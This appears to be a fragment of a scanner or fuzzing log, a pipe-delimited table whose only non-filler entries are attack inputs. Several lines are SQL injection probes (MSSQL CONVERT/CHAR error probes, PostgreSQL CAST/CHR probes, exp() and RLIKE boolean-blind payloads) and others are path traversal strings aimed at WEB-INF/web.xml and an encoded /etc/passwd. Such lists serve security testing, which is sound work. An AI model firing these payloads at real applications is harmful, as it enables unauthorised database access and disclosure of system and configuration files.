1 |
|
|
1 |
1 |
' anD CONVERT(int,CHAR(57)+CHAR(49))>=0 anD '1'='1 |
|
|
|
1 |
1 |
' anD CONVERT(int,CHAR(87)+CHAR(63))>=0 anD '1'='1 |
|
|
|
1 |
1 |
../../../../WEB-INF/web.xml |
|
|
|
1 |
|
|
1 |
1 |
' anD CAST(CHR(89)::text||CHR(59)::text AS NUMERIC) >= 0 anD '1'='1 |
|
|
|
1 |
1 |
' anD CAST(CHR(54)::text||CHR(50)::text AS NUMERIC) >= 0 anD '1'='1 |
|
|
|
1 |
1 |
../../../WEB-INF/web.xml |
|
|
|
1 |
|
|
1 |
1 |
' anD exp(80)=exp(80) anD '1'='1 |
|
|
|
1 |
1 |
' anD exp(1077)=exp(1077) anD '1'='1 |
|
|
|
1 |
|
|
1 |
|
|
1 |
1 |
' RLIKE (SELECT (CASE WHEN (7963=7328) THEN 1 ELSE 0x28 END))-- GSiC |
|
|
|
1 |
1 |
' RLIKE (SELECT (CASE WHEN (0228=0228) THEN 1 ELSE 0x28 END))-- GSiC |
|
|
|
1 |
|
|
1 |
|
|
1 |
|
|
1 |
|
|
1 |
1 |
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F.%2Fpasswd |
|
|
|
|